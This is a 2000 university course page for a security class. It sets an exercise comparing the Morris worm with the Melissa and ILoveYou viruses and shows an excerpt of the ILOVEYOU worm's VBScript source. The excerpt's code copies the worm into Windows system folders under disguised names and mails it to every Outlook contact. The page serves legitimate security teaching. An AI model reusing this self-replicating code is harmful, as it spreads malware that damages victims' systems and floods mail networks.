University of Virginia, Department of Computer Science
CS551: Security and Privacy on the Internet, Fall 2000

Manifest: Monday 30 October 2000

Assignments Due
8 NovemberProject Progress Reports

Work Right Now

With your nearby classmates, fill in as much as possible of the following table, highlighting the most important differences.

Morris Worm, 1988Melissa/ILoveYou, 1999
Vulnerabilities Exploited  
Replication Strategy  
Smart Things Author Did  
Dumb Things Author Did  
Damage Caused  
Response  
Outcome  
Other Interesting Differences  

Readings

Read before 1 November:

Optional additional reading (you will need to read at least one of these for Problem Set 4): Each of these papers describes recent work on systems that constrain the behavior of untrusted code. A question on Problem Set 4 will ask you to evaluate one of these systems in terms of the eight design principles in the Saltzer and Schroeder paper (p. 7 - 8). It is recommended that you read the abstract for each of these on-line, and print out and read the entire paper for the one or more that seem most interesting.



-$10B Program
rem  barok -loveletter(vbe) <i hate go to school>
rem by: spyder  /  ispyder@mail.com  /  @GRAMMERSoft Group  / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
...
sub main()
   On Error Resume Next
   dim wscr,rr
   set wscr=CreateObject("WScript.Shell")
   rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
   if (rr>=1) then
      wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
   end if
   Set dirwin = fso.GetSpecialFolder(0)
   Set dirsystem = fso.GetSpecialFolder(1)
   Set dirtemp = fso.GetSpecialFolder(2)
   Set c = fso.GetFile(WScript.ScriptFullName)
   c.Copy(dirsystem&"\MSKernel32.vbs")
   c.Copy(dirwin&"\Win32DLL.vbs")
   c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
   regruns()
   html()
   spreadtoemail()
   listadriv()
end sub

...

sub spreadtoemail()
   On Error Resume Next
   dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
   set regedit=CreateObject("WScript.Shell")
   set out=WScript.CreateObject("Outlook.Application")
   set mapi=out.GetNameSpace("MAPI")
   for ctrlists=1 to mapi.AddressLists.Count
     set a=mapi.AddressLists(ctrlists)
     x=1
     regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
     if (regv="") then regv=1 end if
     if (int(a.AddressEntries.Count)>int(regv)) then
        for ctrentries=1 to a.AddressEntries.Count
           malead=a.AddressEntries(x)
           regad=""
           regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
           if (regad="") then
              set male=out.CreateItem(0)
              male.Recipients.Add(malead)
              male.Subject = "ILOVEYOU"
              male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
              male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
              male.Send
              regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
           end if
           x=x+1
        next
        regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
     else
        regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
      end if
   next
   Set out=Nothing
   Set mapi=Nothing
end sub

...
(328 total lines)

Links
Anti-Virus Companies
Questions
Normal people learn from their errors. Microsoft users apparently belong to another category.

Charles Bueche (quoted in 'ILOVEYOU' worm turns to States)


CS 655 University of Virginia
Department of Computer Science
CS 551: Security and Privacy on the Internet
David Evans
evans@cs.virginia.edu